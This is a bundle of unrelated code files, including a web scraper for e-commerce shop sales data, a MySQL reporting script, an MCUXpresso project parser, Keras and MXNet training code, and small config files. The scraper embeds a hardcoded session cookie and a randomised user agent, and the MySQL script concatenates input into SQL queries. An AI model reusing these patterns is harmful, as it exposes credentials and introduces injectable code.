+{"seq_id":"558033914","text":"import csv\r\nimport time\r\n\r\nimport requests\r\nfrom fake_useragent import UserAgent\r\n\r\nid_lst=[# shop ID list 1\r\n2209064897522,\r\n2209501154582,\r\n2209795029305,\r\n2210228542894\r\n]\r\nua = UserAgent().random\r\ncookie='_dcc_session=dfqldg9qhr30s7psi7mbbrg7os; Hm_lvt_3a75bcb07225c9d03aae2d67edca6226=1624845895,1624860714,1624874935,1624875276; Hm_lvt_2dc49552d570922026e5fcb79894c7b3=1624845895,1624860714,1624874935,1624875276; acw_tc=781bad2016248769092844328e6a469a4d9038185ef7384feb735b3d435297; _sess_remember=27ee2b45b073d94323d40b1002655c77; Hm_lpvt_2dc49552d570922026e5fcb79894c7b3='+str(int(time.time()))+'; Hm_lpvt_3a75bcb07225c9d03aae2d67edca6226='+str(int(time.time()))\r\n\r\nfor id in id_lst:\r\n try:\r\n headers = {\r\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\r\n 'accept-Encoding': 'gzip, deflate, br',\r\n 'accept-Language': 'zh-CN,zh;q=0.9',\r\n 'cache-Control': 'max-age=0',\r\n 'connection': 'keep-alive',\r\n 'cookie': cookie,\r\n 'host': 'www.dianchacha.com',\r\n 'Referer': 'https://www.dianchacha.com/shop/info/index/uid/'+str(id),\r\n 'User-Agent': ua,\r\n }\r\n\r\n url4 = \"https://www.dianchacha.com/shop/sales/reckonDo?k=\"+str(id)# sales volume estimate endpoint\r\n data_li = []\r\n dict4 = {}\r\n response4 = requests.get(url4,headers=headers).text\r\n print(response4)\r\n sel4 = response4.split('{')[2].split(':')[4:8]\r\n dict4['shop_id'] = id\r\n dict4['monthly_sales'] = sel4[0].split('\"')[1]\r\n dict4['order_count'] = sel4[1].split('\"')[1]\r\n dict4['avg_order_value'] = sel4[2].split('\"')[1]\r\n dict4['avg_daily_sales'] = sel4[3].split('\"')[1]\r\n print(dict4)\r\n data_li.append(dict4)\r\n with open('salesForcast8.csv', 'a+', encoding='utf-8', newline='') as f:\r\n writer = csv.DictWriter(f, fieldnames=data_li[0].keys()) # take the column names from the first row so the rows below map one-to-one\r\n writer.writeheader() # write the header row\r\n writer.writerows(data_li)\r\n print('Data for item '+str(id_lst.index(id))+' written')\r\n time.sleep(20)\r\n except:\r\n print(\"request failed, skipping\")\r\n pass","sub_path":"001 E-Commerce Credit Assessment (1)/001-20210702-电商信用评估-整体报告1/获取月售预测.py","file_name":"获取月售预测.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"479819818","text":"#!/usr/bin/env python3\n\nimport os\nimport 
sys\nimport mysql.connector\nfrom datetime import datetime\nimport settings\nimport csv\nimport time\n\narg=list(sys.argv)\ndata=arg[1]\n\nportallist=settings.getportallist(\"all\")\nif data in portallist:\n\tPORTAL=data\nelse:\n\tPORTAL=settings.getportal(data)\n#Establishing connection to MYSQL server...\nDB=[]\nDB=settings.connecttodb(PORTAL)\nhost=DB[0]\npassword=DB[1]\nuser=DB[2]\ndatabase=DB[3]\nmydb=mysql.connector.connect(host=host,user=user,password=password,database=database)\nmycursor=mydb.cursor()\n\n#Loop for Getting results base on ID(UID,DeviceID,Email)\nfieldnames='ASN,JunctionID,UID,Role,User Name,Email,Login\\n'\nprint(fieldnames)\t\noutput_file=open(\"output_users_advisorgroup.csv\",\"w\")\t\noutput_file.write(fieldnames)\n#csv_writer_1=csv.DictWriter(output_file)\nwith open(\"mailslist_advisor.csv\",\"r\") as mails_file:\n\tcsv_reader=csv.DictReader(mails_file)\n\tUID=[]\n\tfor ID in csv_reader:\n\t\tRESULT=\"\"\n\t\tJunctionID=ID['JunctionID']\n\t\tEmail=ID['Email']\n\t\t#To get details based on MAIL ID .........!!!!!!!\n\t\tmycursor.execute(\"select uid,mail,name,login from ent_users where mail like \\\"%\"+str(Email)+\"%\\\"\")\n\t\tfor x in mycursor:\n\t\t\tUIDS=x[0]\n\t\t\tname=x[2]\n\t\t\tmail=x[1]\n\t\t\tlogin=x[3]\n\t\t\t#UID.append(x[0])\n\t\tmycursor.execute(\"select name from usertoappliancemap uam join ent_users_roles ur on ur.uid = uam.userid join ent_role r on r.rid=ur.rid where uam.userid=\"+str(UIDS))\n\t\tfor y in mycursor:\n\t\t\tROLE=y[0]\n\t\tmycursor.execute(\"select applianceid from usertoappliancemap where userid=\"+str(UIDS))\n\t\tfor y in mycursor:\n\t\t\tASN=y[0]\n\t\tprint(ASN,\",\",JunctionID,\",\",UIDS,\",\",ROLE,\",\",name,\",\",mail,\",\",login)\n\t\tdata=str(ASN)+\",\"+str(JunctionID)+\",\"+str(UIDS)+\",\"+str(ROLE)+\",\"+name+\",\"+mail+\",\"+str(login)+\"\\n\"\n\t\toutput_file.write(data)\n#for UIDS in UID:\n#\tmycursor.execute(\"select name from usertoappliancemap uam join ent_users_roles ur on ur.uid = uam.userid join ent_role r on r.rid=ur.rid where uam.userid=\"+str(UIDS))\n#\tfor y in mycursor:\n#\t\tprint(UIDS,\",\",y[0])\n\t\t#print(JunctionID,\",\",UIDS,\",\",y,\",\",Email)\n\t\t\t#print(JunctionID,\",\",x[0],\",\",Email)\n\t\t\t#print(\"============================================================================================================================================================\\n\")\n\t\t\t#RESULT=x[0]\n\t\t\t#name=x[1]\n\t\t\t#mail=x[2]\n\t\t\t#if(x[0]==0):\n\t\t\t#\tprint(JunctionID,\",\",x[0],\",\",Email)\n\t\t#\tprint(JunctionID,\",\",Email,\",\",\"User not Created\")\n\t\t#else:\n\t\t#\tprint(JunctionID,\",\",RESULT,\",\",name,\",\",mail)\n\t\t#\ttime.sleep(2)\n","sub_path":"Automation/alerts_testsuite/migration/Tasks/Position_3_users_list.py","file_name":"Position_3_users_list.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"597703919","text":"import os\nimport glob\nimport logging\nimport tempfile\n\nfrom difflib import SequenceMatcher\nfrom distutils.version import LooseVersion\nfrom xml.etree import cElementTree as ET\n\nfrom mcutk.apps import eclipse\nfrom mcutk.exceptions import ProjectNotFound, InvalidProject, ProjectParserError\n\nclass Project(eclipse.Project):\n \"\"\"MCUXpresso SDK and projects parser tool.\"\"\"\n\n PROJECT_EXTENSION = '.xml'\n\n @classmethod\n def frompath(cls, path):\n \"\"\"Return a project instance from a given file path or directory.\n\n If path is a directory, it will search 
the project file and return an instance.\n Else this will raise mcutk.apps.exceptions.ProjectNotFound.\n \"\"\"\n if not os.path.exists(path):\n raise ProjectNotFound(\"No such file or directory: %s\" % path)\n\n if os.path.isfile(path) and path.endswith(cls.PROJECT_EXTENSION):\n return cls(path)\n\n instance = None\n for filepath in glob.glob(path + \"/.project\"):\n with open(filepath) as f:\n content = f.read()\n if 'mcux' in content or 'mcuxpresso' in content:\n instance = cls(filepath)\n break\n\n if instance:\n return instance\n\n for filepath in glob.glob(path + \"/*\" + cls.PROJECT_EXTENSION):\n try:\n instance = cls(filepath)\n break\n except InvalidProject:\n pass\n else:\n raise ProjectNotFound(\"Not found .xml\")\n\n return instance\n\n\n\n def __init__(self, prjpath, sdk_root=None, **kwargs):\n \"\"\"MCUXPressoIDE project constructor.\n\n Arguments:\n prjpath {str} -- path to .xml\n\n Keyword Arguments:\n sdk_root {str} -- path to sdk package root, default {None} that will be loaded from xml.\n \"\"\"\n self._is_package = False\n self._sdk_root = sdk_root\n self._name = ''\n self._targets = None\n self._sdkmanifest = None\n self._example_id = None\n self._nature = 'org.eclipse.cdt.core.cnature'\n\n super(Project, self).__init__(prjpath, **kwargs)\n # eclipse project\n self._is_package = not (prjpath.endswith('.project') or prjpath.endswith('.cproject'))\n\n if self._is_package:\n self._load_from_sdk_package(prjpath)\n self._properties_init()\n\n @property\n def is_enabled(self):\n \"\"\"Identify the example if is enabled(SDK package only).\n \"\"\"\n if not self.is_package:\n return True\n\n # check manifest: this exmaple is enabled for mcux\n example_info = self.sdkmanifest.find_example(self._example_id)\n # manifest version 3.1\n if self.sdkmanifest.manifest_version == \"3.1\":\n return True\n\n return \"mcux\" in example_info.get(\"toolchain\", \"\")\n\n @property\n def sdkmanifest(self):\n \"\"\"Getter for SDKMainfest object\"\"\"\n return self._sdkmanifest\n\n @sdkmanifest.setter\n def sdkmanifest(self, value):\n \"\"\"Setter for SDKMainfest object\"\"\"\n if not isinstance(value, SDKManifest):\n raise ValueError(\"Must be a SDKManifest object\")\n\n self._sdkmanifest = value\n\n @property\n def is_package(self):\n \"\"\"Package project or standard eclipse project\"\"\"\n return self._is_package\n\n def _load_from_eclipse_project(self, path):\n \"\"\"Load from Eclipse C/C++ project\"\"\"\n self.parse(path)\n\n def _load_from_sdk_package(self, path):\n \"\"\"Load from SDK .xml and *_manifest*.xml.\n 1. Parse .xml to get manifest.xml,\n 2. Get related information from manifest.\n \"\"\"\n\n self._targets = self._conf.keys()\n\n xmlroot = ET.parse(path).getroot()\n example_node = xmlroot.find('./example')\n if example_node is None:\n raise InvalidProject('Unable to find node. %s'%path)\n\n self._example_id = example_node.attrib.get('id')\n # in some situation, the name attribute is not too simple\n # that is not full project name for mcux, we have to use a workaround\n # to get project name from path.\n # self._name = example_node.attrib.get('name')\n self._name = os.path.basename(path).replace('.xml', '')\n\n try:\n self._nature = example_node.find('projects/project[@nature]').attrib.get('nature')\n except:\n pass\n\n if not self._example_id:\n raise ProjectParserError('None id in exmaple node! 
%s'%self.prjpath)\n\n self._conf = {\n 'Debug': self._example_id + '/Debug/',\n 'Release': self._example_id + '/Release/'\n }\n if self.sdkmanifest:\n return\n\n # Automaticlly find and load SDKManifest\n prjdir_abs = os.path.abspath(self.prjdir).replace('\\\\', '/')\n\n def _search_node(node):\n \"\"\"get sdk_root from an XML element node.\"\"\"\n if node is None:\n return\n\n source_path = node.attrib.get('path')\n if not source_path:\n return\n\n if source_path in prjdir_abs:\n sdk_root = prjdir_abs.replace(source_path, \"\")\n else:\n match = SequenceMatcher(None, prjdir_abs, source_path).find_longest_match(0, len(prjdir_abs), 0, len(source_path))\n sdk_root = prjdir_abs[:match.a]\n\n if os.path.exists(sdk_root):\n return sdk_root\n return\n\n\n def _search_possible_nodes():\n possible_nodes = [\n './source[@type=\"src\"]',\n './source'\n ]\n\n for p in possible_nodes:\n for node in example_node.findall(p):\n sdk_root = _search_node(node)\n\n if not sdk_root:\n continue\n\n try:\n return SDKManifest.load_from_dir(sdk_root)\n except ProjectParserError:\n pass\n\n def _search_from_local():\n # In some situation, example.xml not include the source element.\n # Added a workaround to find mainfest file in it's parent.\n current_dir = prjdir_abs\n while True:\n parent_dir = os.path.dirname(current_dir)\n # system root\n if parent_dir == current_dir:\n break\n try:\n return SDKManifest.load_from_dir(parent_dir)\n except ProjectParserError:\n pass\n\n current_dir = parent_dir\n\n\n manifest = _search_possible_nodes()\n\n if not manifest:\n manifest = _search_from_local()\n\n if manifest:\n self.sdkmanifest = manifest\n else:\n raise ProjectParserError(\"Unable to find SDK Manifest!\")\n\n def _properties_init(self):\n \"\"\"Init build properties variable.\n\n sdk.location = D:/Users/B46681/Desktop/SDK_2.0_MK64FN1M0xxx12-drop4\n This is the location where your SDK have been downloaded.\n You can use either zip or folder containing the SDK\n Please remember that if you want to create linked resources into your project(i.e. standalone = false) you need to use a folder instead of a zip.\n NOTE: on Windows you have to use \"//\" or \"/\".\n\n example.xml = D:/Users/B46681/Desktop/SDK_2.0_MK64FN1M0xxx12-drop4/boards/frdmk64f/demo_apps/hello_world/mcux/hello_world.xml\n If adding the \"example.xml\" property, the examples are retrieved from that specific file and shall valid against the used SDK\n NOTE: on Windows you have to use \"//\" or \"/\".\n\n nature = org.eclipse.cdt.core.cnature\n This represents the nature of your project (i.e. C or C++)\n It can be:\n - org.eclipse.cdt.core.cnature for C projects\n - org.eclipse.cdt.core.ccnature for C++ projects\n (Please remember that the example your're going to create shall support the C++ nature)\n\n standalone = true\n If true, it will copy the files from the SDK, otherwise it will link them.\n Note: linked resources will be only created if the SDK is provided as a folder\n\n project.build = true\n If true, the project will be compiled, otherwise the project is only created.\n\n clean.workspace = true\n True, if you want to clear the workspace used, false otherwise\n\n build.all = false\n If true, all the examples from all the SDK will be created, otherwise you need specify the SDK name\n\n skip.default = false\n If true, skip the default SDKPackages folder and all its content\n Default is false\n\n sdk.name = SDK_2.0_MK64FN1M0xxx12\n The SDK name (i.e. 
the folder/file name without extension)\n NOTE: only used when build.all = false\n\n board.id = frdmk64f\n The board id as for the manifest definition\n NOTE: only used when build.all = false\n\n Other Settings:\n verbose = true\n If true, more info will be provided using stdout\n\n indexer = false\n If true, enable the CDT indexer, false otherwise\n\n project.build.log = true\n If true, show the CDT build log, false otherwise\n\n simple.project.name = true\n\n \"\"\"\n self._buildproperties = {\n 'sdk.location': None,\n 'example.xml': None,\n 'nature': 'org.eclipse.cdt.core.cnature',\n 'standalone': 'true',\n 'project.build': 'true',\n 'clean.workspace': 'true',\n 'build.all': 'false',\n 'build.config': 'debug',\n 'simple.project.name': 'false',\n 'use.other.files': 'true ',\n 'skip.default': 'true',\n 'sdk.name': None,\n 'board.id': '',\n 'verbose': 'false',\n 'indexer': 'false',\n 'use.io.console': 'false',\n 'project.build.log': 'true'\n }\n\n def gen_properties(self, target, dir=None):\n \"\"\"Return a file path for properties file.\n\n Arguments:\n target -- {string} target configuration\n dir -- {string} the location to place the new geneated file, default is system tempfile.\n\n \"\"\"\n # boardid will effect workspace path\n board_ids = self.sdkmanifest.boards\n boardid = self._example_id.replace(\"_\" + self._name, '')\n if boardid not in board_ids:\n boardid = board_ids[0]\n\n logging.info(\"SDK Manifest Version: %s\", self.sdkmanifest.manifest_version)\n\n self.setproperties(\"example.xml\", self.prjpath.replace('\\\\', '/'))\n self.setproperties(\"sdk.location\", self.sdkmanifest.sdk_root.replace('\\\\', '/'))\n self.setproperties(\"nature\", self.nature)\n self.setproperties(\"sdk.name\", self.sdkmanifest.sdk_name)\n self.setproperties(\"board.id\", boardid)\n self.setproperties(\"build.config\", target)\n\n with tempfile.NamedTemporaryFile(dir=None, delete=False, prefix=\"mcux_\", mode='w') as f:\n for per_property, value in self._buildproperties.items():\n f.writelines(\"{0} = {1}\\r\\n\".format(per_property, value))\n properties_file = f.name\n\n logging.debug('properties file: %s', properties_file)\n return properties_file\n\n def setproperties(self, attrib, value):\n \"\"\" Set the value of self._buildproperties\"\"\"\n\n self._buildproperties[attrib] = value\n\n @property\n def nature(self):\n return self._nature\n\n @property\n def targets(self):\n \"\"\"Return all targets name\n\n Returns:\n list -- a list of targets\n \"\"\"\n if self._targets:\n return list(self._targets)\n else:\n return ['Debug', 'Release']\n\n @property\n def name(self):\n \"\"\"Return the application name\n\n Returns:\n string --- app name\n \"\"\"\n return self._name\n\n\nclass SDKManifest(object):\n \"\"\"NXP MCUXpresso SDK Manifest Parser.\"\"\"\n\n @classmethod\n def load_from_dir(cls, sdk_root):\n \"\"\"Load latest version of manifest from directory.\"\"\"\n\n manifestfilelist = glob.glob(\"{0}/*_manifest*.xml\".format(sdk_root))\n if not manifestfilelist:\n raise ProjectParserError(\"cannot found manifest file\")\n\n if len(manifestfilelist) == 1:\n return SDKManifest(manifestfilelist[0])\n\n # Find the max version\n file_versions = {}\n for per_file in manifestfilelist:\n version_str = per_file.replace('.xml', '').split('_manifest')[-1]\n version = version_str[1:] if version_str.startswith('_') else version_str\n if version:\n file_versions[version] = per_file\n\n ver_latest = sorted(file_versions.keys(), key=lambda v: LooseVersion(v))[-1]\n manifest_path = 
file_versions[ver_latest].replace(\"\\\\\",'/')\n\n return SDKManifest(manifest_path)\n\n def __init__(self, filepath):\n xmlParser = ET.parse(filepath)\n self._xmlroot = xmlParser.getroot()\n self._sdk_root = os.path.dirname(filepath)\n self._manifest_version = self._xmlroot.attrib['format_version']\n self._sdk_name = self._xmlroot.attrib[\"id\"]\n self._sdk_version = self._xmlroot.find('./ksdk').attrib['version']\n\n @property\n def sdk_version(self):\n return self._sdk_version\n\n @property\n def sdk_name(self):\n return self._sdk_name\n\n @property\n def manifest_version(self):\n return self._manifest_version\n\n def find_example(self, example_id):\n \"\"\"Return a dict which contains example attributes.\n\n Keys:\n - id\n - name\n - toolchain\n - brief\n - category\n - path\n \"\"\"\n xpath = './boards/board/examples/example[@id=\"{0}\"]'.format(example_id)\n node = self._xmlroot.find(xpath)\n if node is None:\n raise Exception(\"Cannot find example in manifest, id: %s\" % example_id)\n\n return node.attrib\n\n @property\n def boards(self):\n xpath = './boards/board'\n nodes = self._xmlroot.findall(xpath)\n return [n.attrib['id'] for n in nodes]\n\n @property\n def sdk_root(self):\n return self._sdk_root\n","sub_path":"mcutk/apps/mcux/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":14502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"610920936","text":"from __future__ import absolute_import, division, print_function, unicode_literals\r\nimport numpy as np\r\nimport research_datasets as rd\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom keras.models import Model\r\nfrom keras.layers import Input, Dense\r\nfrom keras.utils import np_utils\r\nfrom keras.preprocessing import image\r\n\r\n\r\ntrain_images, train_labels = rd.get_train_data()\r\ntest_images, test_labels = rd.get_test_data()\r\n\r\ntrain_images_num = len(train_images)\r\ntest_images_num = len(test_images)\r\n\r\n# collect the unique class labels (the original comprehension tested membership against an empty list)\r\nclasses = []\r\nfor sign_number in test_labels:\r\n if sign_number not in classes:\r\n classes.append(sign_number)\r\nnum_classes = len(classes)\r\n\r\nprint('Data prepared')\r\n\r\nhidden_size = 512\r\nnum_epochs = 80\r\n\r\nmodel = keras.Sequential([\r\n keras.layers.Flatten(input_shape=(28, 28)),\r\n keras.layers.Dense(hidden_size, activation=tf.nn.relu),\r\n keras.layers.Dense(hidden_size, activation=tf.nn.relu),\r\n keras.layers.Dense(num_classes, activation=tf.nn.softmax) # output size must be the class count, not the epoch count\r\n])\r\n\r\n\r\nmodel.compile(\r\n optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy']\r\n)\r\n\r\nmodel.fit(train_images, train_labels, epochs=num_epochs, verbose=1, validation_split=0.1)\r\n\r\nmodel.save('model.h5')\r\nprint('Model saved!')\r\n\r\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=1)\r\nprint('\\nAccuracy on the test data:', test_acc)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"60736373","text":"import pathlib\nfrom setuptools import setup\nfrom robocop.version import __version__\n\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.rst\").read_text()\nCLASSIFIERS = \"\"\"\nDevelopment Status :: 5 - Production/Stable\nLicense :: OSI Approved :: Apache Software License\nOperating System :: OS Independent\nProgramming Language :: Python\nProgramming Language :: Python :: 
3.6\nProgramming Language :: Python :: 3.7\nProgramming Language :: Python :: 3.8\nFramework :: Robot Framework\nFramework :: Robot Framework :: Tool\nTopic :: Software Development :: Testing\nTopic :: Software Development :: Quality Assurance\nTopic :: Utilities\nIntended Audience :: Developers\n\"\"\".strip().splitlines()\n\nsetup(\n name='robotframework-robocop',\n version=__version__,\n description='Static code analysis tool (linter) for Robot Framework',\n long_description=README,\n long_description_content_type=\"text/x-rst\",\n url=\"https://github.com/MarketSquare/robotframework-robocop\",\n author=\"Bartlomiej Hirsz, Mateusz Nojek\",\n author_email=\"bartek.hirsz@gmail.com, matnojek@gmail.com\",\n license=\"Apache License 2.0\",\n platforms=\"any\",\n classifiers=CLASSIFIERS,\n keywords='robotframework',\n packages=['robocop'],\n include_package_data=True,\n install_requires=['robotframework>=3.2.1'],\n entry_points={'console_scripts': ['robocop=robocop:run_robocop']},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524844597","text":"# Copyright 2020 Elasticsearch BV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__title__ = \"eland\"\n__description__ = \"Python elasticsearch client to analyse, explore and manipulate data that resides in elasticsearch.\"\n__url__ = \"https://github.com/elastic/eland\"\n__version__ = \"7.6.0a4\"\n__author__ = \"Steve Dodson\"\n__author_email__ = \"steve.dodson@elastic.co\"\n__maintainer__ = \"Seth Michael Larson\"\n__maintainer_email__ = \"seth.larson@elastic.co\"\n","sub_path":"eland/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"365088911","text":"import pygame\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nCYAN = (179, 255, 255)\nCOLORS = {\n\t\t\"GREEN\":GREEN,\"RED\":RED,\n\t\t\"BLUE\":BLUE,\"BLACK\":BLACK,\n\t\t\"WHITE\":WHITE, \"CYAN\":CYAN\n\t\t}\n\ndef draw_square(screen,x,y,color):\n\t## takes x y of first cyan 25x25 rectangle\n\t## draws two more rectangles \n\tc = GREEN\n\tif (color.upper() in COLORS):\n\t\tc = COLORS[color.upper()]\n\tpygame.draw.rect(screen, c, [x, y, 25, 25])\n\ndef level_one(v,x,y):\n\topenspace = []\n\tfor i in range(3):\n\t\tdraw_square(v,x,y,\"cyan\")\n\t\topenspace.append([x,y])\n\t\tx+=150\n\t\ty+=0\n\treturn openspace\n\ndef level_two(v,x,y):\n\topenspace = []\n\tfor i in range(3):\n\t\tdraw_square(v,x,y,\"cyan\")\n\t\topenspace.append([x,y])\n\t\tx+=150\n\t\ty-=50\n\treturn openspace\n\ndef level_three(v,x,y):\n\topenspace = []\n\n\tdraw_square(v,x,y,\"cyan\")\n\topenspace.append([x,y])\n\n\tx+=200\n\ty-=200\n\tdraw_square(v,x,y,\"cyan\")\n\topenspace.append([x,y])\n\t\n\tx+=200\n\ty+=200\n\tdraw_square(v,x,y,\"cyan\")\n\topenspace.append([x,y])\n\treturn 
openspace\n\n\t\n############## TESTING ###############\n# pygame.init()\n# size = [800, 500]\n# screen = pygame.display.set_mode(size)\n# pygame.display.set_caption(\"I love my mistress\")\n# loop = True\n# clock = pygame.time.Clock()\n\n# while loop == True:\n\t\n# \tfor event in pygame.event.get():\n# \t\tif event.type == pygame.QUIT:\n# \t\t\tloop = False\n\t\n# \tscreen.fill(WHITE)\n\t\n# \tlevel_one(screen,25,25)\n\t\n# \tclock.tick(60)\n\t\n# \tpygame.display.flip()\n\t\n# pygame.quit()\n\n\n\n\n\n","sub_path":"nowhere_kids/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"481572231","text":"# pylint: skip-file\nimport os\n# MXNET_CPU_WORKER_NTHREADS must be greater than 1 for custom op to work on CPU\nos.environ[\"MXNET_CPU_WORKER_NTHREADS\"] = \"8\"\n\nimport mxnet as mx\nimport numpy as np\nimport logging\nfrom ast import literal_eval\n\nclass YoloTarget(mx.operator.CustomOp):\n '''\n Python (inexact) implementation of yolo output layer.\n '''\n def __init__(self, th_iou, th_iou_neg, th_iou_pass, variances):\n #\n super(YoloTarget, self).__init__()\n self.th_iou = th_iou\n self.th_iou_neg = th_iou_neg\n self.th_iou_pass = th_iou_pass\n self.variances = variances\n\n # precompute nms candidates\n self.anchors = None\n self.anchors_t = None\n self.area_anchors_t = None\n\n def forward(self, is_train, req, in_data, out_data, aux):\n #\n # inputs: ['anchors', 'label', 'probs_cls']\n # outputs: ['target_reg', 'mask_reg', 'target_cls']\n n_batch, nch, n_anchors = in_data[2].shape\n\n labels_all = in_data[1].asnumpy().astype(np.float32) # (batch, num_label, 6)\n labels_all = labels_all[:, :, :5] # last one is difficulty, which I won't use.\n max_cids = mx.nd.argmax(in_data[2], axis=1).asnumpy().astype(int)\n\n # precompute some data for IOU computation\n if self.anchors_t is None:\n self.anchors = np.reshape(in_data[0].asnumpy(), (-1, 4)) # (n_anchor, 4)\n self.anchors_t = mx.nd.transpose(mx.nd.reshape(in_data[0].copy(), shape=(-1, 4)), (1, 0))\n self.area_anchors_t = \\\n (self.anchors_t[2] - self.anchors_t[0]) * (self.anchors_t[3] - self.anchors_t[1])\n\n # numpy arrays for outputs of the layer\n target_reg = np.zeros((n_batch, n_anchors, 4), dtype=np.float32)\n mask_reg = np.zeros_like(target_reg)\n # I will use focal loss, so basically everything is negative.\n target_cls = np.zeros((n_batch, 1, n_anchors), dtype=np.float32)\n\n # mark per-batch positive and ignore samples\n for i in range(n_batch):\n target_cls[i][0], target_reg[i], mask_reg[i] = self._forward_batch_pos( \\\n labels_all[i], max_cids[i], \\\n target_cls[i][0], target_reg[i], mask_reg[i])\n\n target_reg = np.reshape(target_reg, (n_batch, -1, 4))\n mask_reg = np.reshape(mask_reg, (n_batch, -1, 4))\n\n self.assign(out_data[0], req[0], mx.nd.array(target_reg, ctx=in_data[2].context))\n self.assign(out_data[1], req[1], mx.nd.array(mask_reg, ctx=in_data[2].context))\n self.assign(out_data[2], req[2], mx.nd.array(target_cls, ctx=in_data[2].context))\n self.assign(out_data[3], req[3], mx.nd.array(np.minimum(1.0, target_cls), ctx=in_data[2].context))\n\n def _forward_batch_pos(self, labels, max_cids, target_cls, target_reg, mask_reg):\n '''\n labels: (n_label, 5)\n max_cids: (n_anchor, )\n target_cls: (n_anchor, )\n target_reg: (n_anchor, 4)\n mask_reg: (n_anchor, 4)\n '''\n n_anchors = self.anchors_t.shape[1]\n\n labels = _get_valid_labels(labels)\n max_iou = np.zeros(n_anchors, 
dtype=np.float32)\n\n for i, label in enumerate(labels):\n gt_cls = int(label[0]) + 1\n #\n lsq = _autofit_ratio(label[1:], max_ratio=3.0)\n #\n iou = _compute_iou(lsq, self.anchors_t, self.area_anchors_t)\n\n # skip already occupied ones\n iou_mask = iou > max_iou\n max_iou = np.maximum(iou, max_iou)\n if label[0] == -1:\n continue\n gt_sz = np.maximum(label[3]-label[1], label[4]-label[2])\n\n # positive and regression samples\n pidx = np.where(np.logical_and(iou_mask, iou > self.th_iou))[0]\n ridx = np.where(np.logical_and(iou_mask, iou > self.th_iou_neg))[0]\n\n if len(pidx) > 5:\n pidx = np.random.choice(pidx, 5, replace=False)\n elif len(pidx) < 3:\n # TEST\n iou_v = _compute_iou(_adjust_ratio(lsq, 2.0), self.anchors_t, self.area_anchors_t)\n iou_h = _compute_iou(_adjust_ratio(lsq, 0.5), self.anchors_t, self.area_anchors_t)\n\n iou_t = np.maximum(np.maximum(iou, iou_v), iou_h)\n if np.max(iou_t) < self.th_iou_pass:\n continue\n\n sidx = np.argpartition(iou_t, iou_t.size - 5)\n pidx = sidx[-5:]\n pidx = pidx[np.where(iou_t[pidx] > self.th_iou_pass)[0]]\n # ridx = sidx[-5:]\n # pidx = pidx[np.where(iou_t[ridx] > self.th_iou_pass)[0]]\n\n # map ridx first, and then pidx\n ridx = ridx[target_cls[ridx] == 0]\n target_cls[ridx] = -1\n if len(pidx) > 0:\n target_cls[pidx] = gt_cls\n rt, rm = _compute_loc_target(label[1:], self.anchors[pidx, :], self.variances)\n target_reg[pidx, :] = rt\n mask_reg[pidx, :] = rm\n\n return target_cls, target_reg, mask_reg\n\n def backward(self, req, out_grad, in_data, out_data, in_grad, aux):\n '''\n Pass the gradient to their corresponding positions\n '''\n for i, r in enumerate(req):\n self.assign(in_grad[i], r, 0)\n\n\ndef _get_valid_labels(labels):\n #\n n_valid_label = 0\n for label in labels:\n if np.all(label == -1.0):\n break\n n_valid_label += 1\n return labels[:n_valid_label, :]\n\n\ndef _compute_iou(label, anchors_t, area_anchors_t):\n #\n iw = mx.nd.minimum(label[2], anchors_t[2]) - mx.nd.maximum(label[0], anchors_t[0])\n ih = mx.nd.minimum(label[3], anchors_t[3]) - mx.nd.maximum(label[1], anchors_t[1])\n I = mx.nd.maximum(iw, 0) * mx.nd.maximum(ih, 0)\n U = (label[3] - label[1]) * (label[2] - label[0]) + area_anchors_t\n\n iou = I / mx.nd.maximum((U - I), 1e-08)\n return iou.asnumpy() # (num_anchors, )\n\n\ndef _compute_loc_target(gt_bb, bb, variances):\n #\n loc_target = np.zeros_like(bb)\n aw = bb[:, 2] - bb[:, 0]\n ah = bb[:, 3] - bb[:, 1]\n loc_target[:, 0] = (gt_bb[2] + gt_bb[0] - bb[:, 2] - bb[:, 0]) * 0.5 / aw\n loc_target[:, 1] = (gt_bb[3] + gt_bb[1] - bb[:, 3] - bb[:, 1]) * 0.5 / ah\n loc_target[:, 2] = np.log((gt_bb[2] - gt_bb[0]) / aw)\n loc_target[:, 3] = np.log((gt_bb[3] - gt_bb[1]) / ah)\n return loc_target / variances, np.ones_like(loc_target)\n# def _compute_loc_target(gt_bb, bb):\n# loc_target = np.tile(np.reshape(gt_bb, (1, -1)), (bb.shape[0], 1))\n# loc_mask = np.ones_like(loc_target)\n# return loc_target, loc_mask\n\n\ndef _adjust_ratio(bb, ratio):\n #\n ww = 